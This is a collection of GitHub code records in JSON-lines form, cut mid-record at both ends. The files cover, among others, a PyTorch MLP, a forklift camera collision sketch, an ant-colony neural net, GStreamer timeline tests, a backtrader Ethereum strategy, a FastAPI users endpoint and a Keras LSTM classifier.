\"Away\"\t\t\t\t\r\n\r\n\t\tprint(out)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"frankfredj/MLB_Betting","sub_path":"0_Scrapper.PY.py","file_name":"0_Scrapper.PY.py","file_ext":"py","file_size_in_byte":57199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22062765987","text":"from enum import Enum\r\nimport shutil\r\nimport os\r\nimport ctypes\r\nimport itertools\r\nimport os\r\nimport string\r\nimport platform\r\n\r\ndef check_disk_space(path):\r\n \r\n \"\"\" chech the path space total,used and free spaces\r\n arguments : path (directory)\r\n return : dectionary includes the statistices \r\n \r\n \"\"\"\r\n # statistices variable\r\n stat = 0 \r\n \r\n try: \r\n # extracte the statistices of the directory \r\n stat = shutil.disk_usage(path) \r\n except:\r\n print(\"Path Error --- check_disk_space()\")\r\n print(\"the returned statistices is relevent to the user dirctory \") \r\n try:\r\n # extracte the statistices of the user directory\r\n path = os.path.expanduser('~')\r\n stat = shutil.disk_usage(path) \r\n except:\r\n print(\"Error \") \r\n return {\"total\":stat[0],\"used\":stat[1],\"free\":stat[2]}\r\n\r\n\r\n\r\nclass uploading_data():\r\n DATA = list()\r\n \r\nupload_data = uploading_data.DATA \r\n\r\n\r\ndef get_available_drives():\r\n if 'Windows' not in platform.system():\r\n return []\r\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\r\n return list(itertools.compress(string.ascii_uppercase,\r\n map(lambda x:ord(x) - ord('0'), bin(drive_bitmask)[:1:-1])))\r\n\r\n# Enum type to express the Connection status\r\nclass Connection_Status(Enum):\r\n CONNECTED = True\r\n NOT_CONNECTED = False\r\n\r\n# Enum type to express the Connection status\r\nclass Connection_Status_IP(Enum):\r\n CONNECTED = True\r\n NOT_CONNECTED = False\r\n \r\n# Enum type to express the program status\r\nclass program_States(Enum):\r\n IDLE = 0\r\n CHECK_CONNECTION = 1\r\n UPLOAD = 2\r\n VALIDATION = 3\r\n DELETE = 4\r\n\r\nInternet_Connection_Status = None\r\nInternet_Connection_Status_IP = None\r\n\r\nProgram_State = program_States.IDLE\r\nFiles = []\r\n\r\n\r\n \r\n\r\nclass Uploading_Folder_Status(Enum):\r\n FOLDER_UPLOADING_DONE = True\r\n FOLDER_UPLOADING_NOT_DONE = False\r\nclass Uploading_File_Status(Enum):\r\n FILE_UPLOADING_DONE = True\r\n FILE_UPLOADING_NOT_DONE = False\r\n \r\nUploading_Folder_state = Uploading_Folder_Status.FOLDER_UPLOADING_DONE\r\nUploading_file_state = Uploading_File_Status.FILE_UPLOADING_DONE","repo_name":"Abdullahsaeed24/CarSync","sub_path":"CarSync/Project Script/script0212/shared_data.py","file_name":"shared_data.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24206625959","text":"from argparse import ArgumentParser\n\nimport torch\nimport torch.nn as nn\n\n\nclass MLP(nn.Module):\n def __init__(self, dropout_prob: float = 0.2, in_features: int = 28 * 28,\n out_features: int = 10, hidden_dim: int = 1000,\n **kwargs\n ):\n super().__init__()\n\n self.dropout_prob = dropout_prob\n self.in_features = in_features\n self.out_features = out_features\n self.hidden_dim = hidden_dim\n\n self.c_d1 = nn.Linear(in_features=self.in_features,\n out_features=self.hidden_dim)\n self.c_d1_bn = nn.BatchNorm1d(self.hidden_dim)\n self.c_d1_drop = nn.Dropout(self.dropout_prob)\n\n self.c_d2 = nn.Linear(in_features=self.hidden_dim,\n out_features=self.out_features)\n\n def forward(self, x):\n x = self.c_d1(x.view(x.size(0), -1))\n x = torch.tanh(x)\n x = self.c_d1_bn(x)\n x = self.c_d1_drop(x)\n x = self.c_d2(x)\n return x\n\n @staticmethod\n def add_model_specific_args(parent_parser, root_dir): # pragma: no-cover\n \"\"\"\n Define parameters that only apply to this model\n \"\"\"\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n\n # network params\n parser.add_argument('--in_features', default=32 * 32 * 3, type=int)\n parser.add_argument('--out_features', default=10, type=int)\n parser.add_argument('--hidden_dim', default=512 * 16, type=int)\n parser.add_argument('--dropout_prob', default=0.2, type=float)\n return parser\n","repo_name":"mo-arvan/pytorch-lightning-template","sub_path":"mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2673649399","text":"import pySerial\nimport pyRobot\nimport cv2\nimport numpy as np\nimport winsound\n\n# Connect to the microcontroller or controller\nser = serial.Serial('COM3', 9600)\n\n# Initialize the forklift object\nforklift = pyRobot.Forklift()\n\n# Initialize the cameras\ncamera1 = cv2.VideoCapture(0)\ncamera2 = cv2.VideoCapture(1)\ncamera3 = cv2.VideoCapture(2)\ncamera4 = cv2.VideoCapture(3)\n\n# Set the collision distance threshold\ncollision_distance = 0.5 # meters\n\nwhile True:\n # Get the images from the cameras\n ret1, frame1 = camera1.read()\n ret2, frame2 = camera2.read()\n ret3, frame3 = camera3.read()\n ret4, frame4 = camera4.read()\n\n frames = [frame1, frame2, frame3, frame4]\n for frame in frames:\n # Convert the image to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect edges in the image\n edges = cv2.Canny(gray, 50, 150)\n\n # Find contours in the image\n _, contours, _ = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Iterate over the contours\n for contour in contours:\n # Get the moments of the contour\n moments = cv2.moments(contour)\n\n if moments[\"m00\"] != 0:\n # Get the centroid of the contour\n x = int(moments[\"m10\"] / moments[\"m00\"])\n y = int(moments[\"m01\"] / moments[\"m00\"])\n\n # Calculate the distance from the centroid to the forklift\n distance = calculate_distance(x, y)\n\n # Check if the distance is less than the collision distance threshold\n if distance < collision_distance:\n # Play a warning beep sound\n winsound.Beep(2000, 500)\n # Stop the forklift\n forklift.stop()\n ser.write('S')\n break\n # Move the forklift forwards\n forklift.move_forwards()\n ser.write('F')\n\n# Release the cameras\ncamera1.release()\ncamera2.release()\ncamera3.release()\ncamera4.release()\n","repo_name":"Tatendamarshall/Robot-Forklift","sub_path":"Forklift.py","file_name":"Forklift.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9591829150","text":"##Importing Packages\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import accuracy_score\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('dark_background')\r\n\r\n##Defining the ACO_NN class\r\nclass ACONN:\r\n #init_Method\r\n def __init__(self, input_layer_size, hidden_layer_size, output_layer_size):\r\n self.input_layer_size = input_layer_size\r\n self.hidden_layer_size = hidden_layer_size\r\n self.output_layer_size = output_layer_size\r\n self.W1 = np.random.randn(self.input_layer_size, self.hidden_layer_size)\r\n self.W2 = np.random.randn(self.hidden_layer_size, self.output_layer_size)\r\n \r\n ##Forward Propagation\r\n def forward_Propagation(self, X):\r\n self.z1 = np.dot(X, self.W1)\r\n self.a1 = self.sigmoid(self.z1)\r\n self.z2 = np.dot(self.a1, self.W2)\r\n self.y_hat = self.sigmoid(self.z2)\r\n return self.y_hat\r\n \r\n #Sigmoid Activation Function\r\n def sigmoid(self, z):\r\n return 1 / (1 + np.exp(-z))\r\n\r\n #Fitness Function / Cost Function\r\n def cost_function(self, X, y):\r\n self.y_hat = self.forward_Propagation(X)\r\n J = 0.5 * np.sum((y - self.y_hat) ** 2)\r\n return J\r\n\r\n def ant_colony_optimization(self, X, y, max_iterations, num_ants, alpha, beta, rho, q):\r\n # Initialize the list to store the cost over generations\r\n cost_history_run = []\r\n pheromone = np.ones((self.input_layer_size, self.hidden_layer_size, self.output_layer_size))\r\n for i in range(max_iterations):\r\n ants = []\r\n for j in range(num_ants):\r\n ant = {}\r\n ant['path'] = []\r\n ant['pheromone'] = []\r\n ant['cost'] = 0\r\n ant['W1'] = np.zeros((self.input_layer_size, self.hidden_layer_size))\r\n ant['W2'] = np.zeros((self.hidden_layer_size, self.output_layer_size))\r\n ant['path'].append(np.random.randint(self.input_layer_size))\r\n ant['path'].append(np.random.randint(self.hidden_layer_size))\r\n for k in range(self.output_layer_size):\r\n ant['path'].append(np.random.randint(self.hidden_layer_size))\r\n for k in range(self.input_layer_size):\r\n for l in range(self.hidden_layer_size):\r\n ant['pheromone'].append(pheromone[k][l][0])\r\n for k in range(self.hidden_layer_size):\r\n for l in range(self.output_layer_size):\r\n ant['pheromone'].append(pheromone[0][k][l])\r\n for k in range(self.input_layer_size):\r\n for l in range(self.hidden_layer_size):\r\n if np.random.rand() < ant['pheromone'][k * self.hidden_layer_size + l]:\r\n ant['W1'][k][l] = np.random.randn()\r\n for k in range(self.hidden_layer_size):\r\n for l in range(self.output_layer_size):\r\n if np.random.rand() < ant['pheromone'][self.input_layer_size * self.hidden_layer_size + k * self.output_layer_size + l]:\r\n ant['W2'][k][l] = np.random.randn()\r\n ant['cost'] = self.cost_function(X, y)\r\n ants.append(ant)\r\n ants = sorted(ants, key=lambda x: x['cost'])\r\n best_ant = ants[0]\r\n for k in range(self.input_layer_size):\r\n for l in range(self.hidden_layer_size):\r\n pheromone[k][l][0] = (1 - rho) * pheromone[k][l][0] + q / best_ant['cost'] * (best_ant['W1'][k][l] != 0)\r\n for k in range(self.hidden_layer_size):\r\n for l in range(self.output_layer_size):\r\n pheromone[0][k][l] = (1 - rho) * pheromone[0][k][l] + q / best_ant['cost'] * (best_ant['W2'][k][l] != 0)\r\n self.W1 = best_ant['W1']\r\n self.W2 = best_ant['W2']\r\n print(f\"Generation {i+1}, Best Cost: {best_ant['cost']}\")\r\n cost_history_run.append(best_ant['cost'])\r\n plt.plot(cost_history_run)\r\n plt.xlabel('Generation')\r\n plt.ylabel('Loss')\r\n plt.show()\r\n \r\n def train(self, X, y, max_iterations, num_ants, alpha, beta, rho, q):\r\n self.ant_colony_optimization(X, y, max_iterations, num_ants, alpha, beta, rho, q)\r\n\r\n def predict(self, X):\r\n y_hat = self.forward(X)\r\n predictions = np.round(y_hat)\r\n return predictions\r\n \r\n##Loading the dataset\r\ndata = pd.read_csv(\"Bank_Personal_Loan_Modelling.csv\")\r\nx = data.drop(['Personal Loan','ID'],axis=1).values\r\ny = data['Personal Loan'].values\r\n\r\n##Train Test Split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.3,random_state=9)\r\n\r\n##Data Pre-Processing\r\nSC = StandardScaler()\r\nx_train = SC.fit_transform(x_train)\r\nx_test = SC.fit_transform(x_test)\r\n\r\n##Creating the Instance For ACO_NN class\r\naconn = ACONN(input_layer_size=x_train.shape[1], hidden_layer_size=4, output_layer_size=1)\r\n\r\n## Training the network\r\naconn.train(x_train, y_train, max_iterations=10, num_ants=10, alpha=1, beta=1, rho=0.5, q=1)\r\n\r\n## Predicting the Values\r\ny_pred = aconn.predict(x_test)\r\naccuracy = accuracy_score(y_test, y_pred)\r\nprint('Accuracy:', accuracy)","repo_name":"MuthuPalaniappan925/Intelligent-Neural-Network-Optimization-with-Evolutionary-Algorithms","sub_path":"Ant Colony Optimization with ANN/ACO_NN.py","file_name":"ACO_NN.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7631300475","text":"import gi\n\ngi.require_version(\"Gst\", \"1.0\")\ngi.require_version(\"GES\", \"1.0\")\n\nfrom gi.repository import Gst # noqa\nfrom gi.repository import GES # noqa\nimport unittest # noqa\nfrom unittest import mock\n\nfrom .common import create_main_loop\nfrom .common import create_project\nfrom .common import GESSimpleTimelineTest # noqa\n\nGst.init(None)\nGES.init()\n\n\nclass TestTimeline(unittest.TestCase):\n\n def test_signals_not_emitted_when_loading(self):\n mainloop = create_main_loop()\n timeline = create_project(with_group=True, saved=True)\n\n # Reload the project, check the group.\n project = GES.Project.new(uri=timeline.get_asset().props.uri)\n\n loaded_called = False\n def loaded(unused_project, unused_timeline):\n nonlocal loaded_called\n loaded_called = True\n mainloop.quit()\n project.connect(\"loaded\", loaded)\n\n timeline = project.extract()\n\n signals = [\"layer-added\", \"group-added\", \"track-added\"]\n handle = mock.Mock()\n for signal in signals:\n timeline.connect(signal, handle)\n\n mainloop.run()\n self.assertTrue(loaded_called)\n handle.assert_not_called()\n\nclass TestEditing(GESSimpleTimelineTest):\n\n def test_transition_disappears_when_moving_to_another_layer(self):\n self.timeline.props.auto_transition = True\n unused_clip1 = self.add_clip(0, 0, 100)\n clip2 = self.add_clip(50, 0, 100)\n self.assertEquals(len(self.layer.get_clips()), 4)\n\n layer2 = self.timeline.append_layer()\n clip2.edit([], layer2.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE, clip2.props.start)\n self.assertEquals(len(self.layer.get_clips()), 1)\n self.assertEquals(len(layer2.get_clips()), 1)\n\n def test_transition_moves_when_rippling_to_another_layer(self):\n self.timeline.props.auto_transition = True\n clip1 = self.add_clip(0, 0, 100)\n clip2 = self.add_clip(50, 0, 100)\n all_clips = self.layer.get_clips()\n self.assertEquals(len(all_clips), 4)\n\n layer2 = self.timeline.append_layer()\n clip1.edit([], layer2.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, clip1.props.start)\n self.assertEquals(self.layer.get_clips(), [])\n self.assertEquals(set(layer2.get_clips()), set(all_clips))\n\n def test_transition_rippling_after_next_clip_stays(self):\n self.timeline.props.auto_transition = True\n clip1 = self.add_clip(0, 0, 100)\n clip2 = self.add_clip(50, 0, 100)\n all_clips = self.layer.get_clips()\n self.assertEquals(len(all_clips), 4)\n\n clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, clip2.props.start + 1)\n self.assertEquals(set(self.layer.get_clips()), set(all_clips))\n\n def test_transition_rippling_over_does_not_create_another_transition(self):\n self.timeline.props.auto_transition = True\n\n clip1 = self.add_clip(0, 0, 17 * Gst.SECOND)\n clip2 = clip1.split(7.0 * Gst.SECOND)\n # Make a transition between the two clips\n clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE, 4.5 * Gst.SECOND)\n\n # Rippl clip1 and check that transitions ar always the sames\n all_clips = self.layer.get_clips()\n self.assertEquals(len(all_clips), 4)\n clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, 41.5 * Gst.SECOND)\n self.assertEquals(len(self.layer.get_clips()), 4)\n clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, 35 * Gst.SECOND)\n self.assertEquals(len(self.layer.get_clips()), 4)\n\n\nclass TestSnapping(GESSimpleTimelineTest):\n\n def test_snapping(self):\n self.timeline.props.auto_transition = True\n self.timeline.set_snapping_distance(1)\n clip1 = self.add_clip(0, 0, 100)\n\n # Split clip1.\n split_position = 50\n clip2 = clip1.split(split_position)\n self.assertEquals(len(self.layer.get_clips()), 2)\n self.assertEqual(clip1.props.duration, split_position)\n self.assertEqual(clip2.props.start, split_position)\n\n # Make sure snapping prevents clip2 to be moved to the left.\n clip2.edit([], self.layer.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE,\n clip2.props.start - 1)\n self.assertEqual(clip2.props.start, split_position)\n\n\nclass TestTransitions(GESSimpleTimelineTest):\n\n def test_emission_order_for_transition_clip_added_signal(self):\n self.timeline.props.auto_transition = True\n unused_clip1 = self.add_clip(0, 0, 100)\n clip2 = self.add_clip(100, 0, 100)\n\n # Connect to signals to track in which order they are emitted.\n signals = []\n\n def clip_added_cb(layer, clip):\n self.assertIsInstance(clip, GES.TransitionClip)\n signals.append(\"clip-added\")\n self.layer.connect(\"clip-added\", clip_added_cb)\n\n def property_changed_cb(clip, pspec):\n self.assertEqual(clip, clip2)\n self.assertEqual(pspec.name, \"start\")\n signals.append(\"notify::start\")\n clip2.connect(\"notify::start\", property_changed_cb)\n\n # Move clip2 to create a transition with clip1.\n clip2.edit([], self.layer.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE, 50)\n # The clip-added signal is emitted twice, once for the video\n # transition and once for the audio transition.\n self.assertEqual(signals, [\"notify::start\", \"clip-added\", \"clip-added\"])\n","repo_name":"namanyadav12/GStreamer","sub_path":"tests/check/python/test_timeline.py","file_name":"test_timeline.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27028430579","text":"from __future__ import (absolute_import, division, print_function, unicode_literals)\nimport backtrader as bt\nimport datetime\nimport os\nfrom time import time\nfrom color import Color\nimport talib as ta\nfrom base_strategy import BaseStrategies, print_time_elapsed\n\n\non_or_off = []\nrand_num = []\nhistogram_set = set()\nhistogram_list = list()\n\nema_short = 0\nema_long = 0\n\n\nclass EthereumStrategy(BaseStrategies):\n \n def __init__(self):\n super(EthereumStrategy, self).__init__()\n self.prev_ema_short = 0\n\n\n # region [blue]\n def macd_day_strategy(self):\n if not self.order:\n if not self.position:\n if self.macd_histogram[0] >= 0:\n self.order = self.buy()\n else:\n if self.macd_histogram[0] < 0:\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02)\n\n # end region\n\n \n # region [blue]\n def exponential_averages(self):\n if not self.order:\n if not self.position:\n if self.ema_short[0] > self.ema_long[0] + (self.ema_long[0] * 0.005):\n self.order = self.buy()\n self.buyprice = self.dataclose[0]\n else:\n if self.ema_short[0] < self.ema_long[0]:\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02) \n # end region\n\n\n\n # region [blue]\n def hybrid_strategy(self):\n\n # current_price = self.dataclose[0]\n global histogram_list\n \n histogram_list.append(self.macd_histogram[0])\n\n if not self.order:\n if not self.position:\n # if self.ema_very_short[0] > self.ema_short[0]:\n if self.ema_short[0] > self.ema_long[0] + self.ema_long[0] * 0.004 or self.rsi < 21:\n self.order = self.buy()\n self.buyprice = self.dataclose[0]\n else:\n if self.macd_histogram[0] < -3.6 or self.macd_histogram[0] > 5:\n global histogram_set\n histogram_set.add(self.macd_histogram[0])\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02)\n\n self.prev_ema_short = self.ema_short[0]\n # end region\n\n\n\n # TIMM ![(1 == F) and (2 == T)]\n def hybrid_strategy_optimizer(self):\n global on_or_off\n global rand_num\n global ema_short\n global ema_long\n\n macd_lower_threshold = rand_num[0]\n macd_upper_threshold = rand_num[1]\n \n ema_short = self.ema_short\n ema_long = self.ema_long\n\n\n if not self.order:\n if not self.position:\n if self.ema_short[0] > self.ema_long[0] + self.ema_long[0] * 0.04 or self.rsi < 21:\n self.order = self.buy()\n self.buyprice = self.dataclose[0]\n else:\n if not ((not (self.macd_histogram[0] < macd_lower_threshold) ) and (on_or_off[0])) and \\\n not ( not (self.macd_histogram[0] > macd_upper_threshold) ) and (on_or_off[1]):\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02)\n\n\n # region [red]\n def next(self):\n \n \"\"\"\n Possible strategies\n self.buy_and_hold()\n self.macd_strategy()\n self.rsi_strategy()\n self.ppsr()\n self.hybrid_strategy()\n self.exponential_averages()\n self.hybrid_strategy_optimizer()\n \"\"\"\n\n # self.buy_and_hold()\n # self.macd_strategy()\n # self.rsi_strategy()\n # self.ppsr()\n # self.exponential_averages()\n self.hybrid_strategy()\n # self.hybrid_strategy_optimizer()\n # end region\n\n\ndef print_header():\n os.system(\"cls\")\n print(\"\\n\\n\")\n print(\"#\"*60)\n print(\" \"*20 + \"START OF PROGRAM\")\n print(\"#\"*60)\n print()\n\n\ndef run_backtesting():\n cerebro = bt.Cerebro()\n cerebro.addstrategy(EthereumStrategy)\n\n data = bt.feeds.YahooFinanceCSVData(\n dataname=\"data/ETH-USD.csv\",\n\n # Everything\n # fromdate=datetime.datetime(2015, 8, 7),\n # todate=datetime.datetime(2021, 3, 19),\n\n # normalized\n fromdate=datetime.datetime(2017, 8, 7),\n todate=datetime.datetime(2021, 3, 19),\n\n # slice 1\n # fromdate=datetime.datetime(2017, 5, 30),\n # todate=datetime.datetime(2018, 5, 30),\n\n # slice 2\n # fromdate=datetime.datetime(2018, 5, 30),\n # todate=datetime.datetime(2019, 5, 30),\n\n # slice 3\n # fromdate=datetime.datetime(2019, 5, 30),\n # todate=datetime.datetime(2020, 5, 30),\n\n # slice 4\n # fromdate=datetime.datetime(2020, 5, 30),\n # todate=datetime.datetime(2021, 5, 30),\n\n # small test slice\n # fromdate=datetime.datetime(2021, 1, 1),\n # todate=datetime.datetime(2021, 3, 27),\n \n reverse=False)\n\n starting_cash = 1\n binance_fixed_trade_fee = 0.00075\n\n cerebro.adddata(data)\n cerebro.broker.setcash(starting_cash)\n cerebro.addsizer(bt.sizers.AllInSizer)\n\n relative_trade_fee = cerebro.broker.getvalue() * binance_fixed_trade_fee\n cerebro.broker.setcommission(commission=relative_trade_fee, margin=True) \n cerebro.run()\n # histogram_list = sorted(histogram_set)\n\n\n\n cerebro.plot()\n return cerebro.broker.getvalue()\n\n\n\ndef run_hybrid_optimizer():\n global rand_num\n global on_or_off\n global ema_short\n global ema_long\n\n start_time = time()\n optimized_list = list()\n max = 0\n\n # LOWER_THRESHOLD (-3.6), HIGHER_THRESHOLD (5)\n # if self.macd_histogram[0] < -3.6 or self.macd_histogram[0] > 5:\n\n # lower_threshold: -10.0, -9.9, -9.8, ... , upper_threshold\n # (-10.0 + (.1 * i)) (i < upper)\n\n # upper_threshold: 10.0, 9.9, 9.8, ... , lower_threshold\n # 0.010, 0.011, 0.012, ... , 0.20 (190) (.01 + (.001 * i))\n \n # trail amount = 0.010, 0.011, 0.012, ... , 0.20 (190) (.01 + (.001 * i))\n\n\n for lower_thres in range(0, 200):\n \n print_time_elapsed(start_time, Color.OKBLUE)\n\n for upper_thres in range(lower_thres, 200):\n\n for i in range(2**2):\n \n rand_num = [ (-10.0 + (.1 * lower_thres)), round((-10 + (.1 * upper_thres)), 2) ]\n on_or_off = [int(i//2)%2, int(i//1)%2]\n number = run_backtesting()\n \n if number > max:\n print(\"Found: \", end='')\n print_time_elapsed(start_time)\n print(on_or_off, rand_num)\n print(str(number) + \"\\n\")\n print(\"ema_short: \", ema_short)\n print(\"ema_long: \", ema_long)\n optimized_list.append(str(on_or_off) + str(rand_num) + \"\\n\" + str(number) + \"\\n\" + \"ema_short: \" + str(ema_short) + \"\\n\" + \"ema_long: \" + str(ema_long) + \"\\n\")\n max = number\n\n print(\"FINAL----------\")\n print_time_elapsed(start_time, Color.Red)\n for i in optimized_list:\n print(i) \n\n\n\nif __name__ == '__main__':\n print_header()\n # run_hybrid_optimizer()\n run_backtesting()\n","repo_name":"RoryGlenn/BackTesting","sub_path":"etherium_strategy.py","file_name":"etherium_strategy.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6172669499","text":"def myEval(coeff, x):\n \"\"\"Evaluates the polynomial expressed as coeff at the value x.\"\"\"\n deg = len(coeff)\n sum = coeff[0]\n\n if deg != 1:\n for i in range(1, deg):\n sum = sum + coeff[i] * x**i\n \n return sum","repo_name":"TnMarshall/ECE02_2022_Project_Documentation","sub_path":"pythonPointKinematics/myEval.py","file_name":"myEval.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3985134691","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom database.config import get_db\nfrom database.models import Friendship, Users\n\nfrom utils.auth import get_current_user\n\n\nrouter = APIRouter(prefix=\"/users\", tags=[\"Global Users\"])\n\n\n@router.get(\"/\")\nasync def get_all_users(\n user=Depends(get_current_user), database: Session = Depends(get_db)\n):\n db_users = database.query(Users).all()\n\n response = []\n\n for db_user in db_users:\n friendship = (\n database.query(Friendship)\n .filter(Friendship.user_id == user.id, Friendship.friend_id == db_user.id)\n .first()\n )\n\n response.append(\n {\n \"user_id\": db_user.id,\n \"first_name\": db_user.first_name,\n \"last_name\": db_user.last_name,\n \"username\": db_user.username,\n \"picture\": db_user.picture,\n \"friendship\": False if friendship is None else True,\n }\n )\n\n return response\n","repo_name":"tovarc/social-app-backend","sub_path":"routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18229058597","text":"import os, glob, sys, _pickle, time, math, gc\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom keras.models import Model, load_model\nfrom keras import optimizers, Sequential\nfrom keras.utils import plot_model\nfrom keras import layers #Dense, LSTM, RepeatVector, TimeDistributed, Dropout, Masking, BatchNormalization, Flatten, Input, Conv2D, MaxPooling1D, Conv1D, Reshape, GRU\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping, CSVLogger\nfrom sklearn.metrics import confusion_matrix\nfrom matplotlib import pyplot as plt\nfrom keras import backend as K\nfrom datetime import datetime\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nclass interpretModel:\n \"\"\"\n Note: Currently switched suffle to False for both train_generator and train_test_split\n\n \"\"\"\n\n def __init__(self, path, task):\n self.dataPath = path\n self.task = task\n now = datetime.now()\n month_ = datetime.now().month\n day_ = now.day\n hour_ = now.hour\n minute_ = now.minute\n\n def setData(self, data):\n \"\"\"\n Allows another class to set data\n \"\"\"\n self.data = data\n self.train_data = [data[:,0], data[:,1]]\n self.test_data = [data[:,2], data[:,3]]\n #print (\"train Data {} test Data {}\".format(self.train_data[0].shape, self.test_data[0].shape))\n\n\n def buildModelv1(self, timesteps, n_features):\n \"\"\"\n Simple model which yields a high accuracy of 90% on training data but sucks on the validation data\n \"\"\"\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.LSTM(256, input_shape=(timesteps, n_features), return_sequences=True)(model_input)\n dropout_output = layers.Dropout(rate=0.5)(lstm_output)\n flatten_output = layers.Flatten()(dropout_output)\n dense_output1 = layers.Dense(128, activation='relu')(flatten_output)\n dropout_output2 = layers.Dropout(rate=0.5)(dense_output1)\n dense_output2 = layers.Dense(15, activation='softmax')(dropout_output2)\n lstm_classifier = Model(model_input, dense_output2)\n #lstm_classifier.summary()\n\n return lstm_classifier\n\n def buildModelv2(self, timesteps, n_features):\n \"\"\"\n An lstm-encoder model followed by dense layers, similar performance to just lstm\n \"\"\"\n lstm_hidden1 = 128#*4\n lstm_hidden2 = 64\n dense_hidden1 = 64\n output_layer = 15\n\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.LSTM(lstm_hidden1, input_shape=(timesteps, n_features), return_sequences=True)(model_input) #previously 96\n dropout_output = layers.Dropout(rate=0.4, noise_shape=(None, None, lstm_hidden1))(lstm_output) #previously 0.4\n batch_norm1 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dropout_output)\n lstm_output2 = layers.LSTM(lstm_hidden2, input_shape=(timesteps, n_features), return_sequences=False)(batch_norm1)\n dropout_output = layers.Dropout(rate = 0.5, noise_shape=(None, lstm_hidden2))(lstm_output2)\n batch_norm2 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dropout_output)\n repeat_vector = layers.RepeatVector(timesteps)(batch_norm2)\n\n flatten_output = layers.Flatten()(repeat_vector)\n batch_norm2 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(flatten_output)\n dropout_output = layers.Dropout(rate = 0.5)(batch_norm2)\n dense_output1 = layers.Dense(dense_hidden1, activation='relu')(dropout_output)\n batch_norm3 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dense_output1)\n dense_output2 = layers.Dense(output_layer, activation='softmax')(batch_norm3)\n lstm_classifier = Model(model_input, dense_output2)\n lstm_classifier.summary()\n\n return lstm_classifier\n\n def buildModelv3(self, timesteps, n_features):\n \"\"\"\n An lstm-encoder model followed by dense layers, similar performance to just lstm\n \"\"\"\n print (\"Using a conv-net approach\")\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.Conv1D(filters= 128, kernel_size=3, data_format='channels_first')(model_input) #previously 96\n dropout_output = layers.MaxPooling1D(pool_size=2)(lstm_output)\n flatten_output = layers.Flatten()(dropout_output)\n dense_output1 = layers.Dense(64, activation='relu')(flatten_output)\n batch_norm3 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dense_output1)\n dense_output2 = layers.Dense(15, activation='softmax')(batch_norm3)\n lstm_classifier = Model(model_input, dense_output2)\n lstm_classifier.summary()\n\n return lstm_classifier\n\n def buildModelv4(self, timesteps, n_features):\n \"\"\"\n An lstm-encoderdecoder model followed by dense layers\n \"\"\"\n print (\"Using a lstm encoder-decoder approach\")\n\n lstm_hidden1 = 128#512\n lstm_hidden2 = 32\n dense_hidden1 = 48\n output_layer = 15\n\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.LSTM(lstm_hidden1, input_shape=(timesteps, n_features), return_sequences=True)(model_input) #previously 96\n dropout_output = layers.Dropout(rate=0.4, noise_shape=(None, None, lstm_hidden1))(lstm_output) #previously 0.4\n batch_norm1 = layers.BatchNormalization(axis=-1, 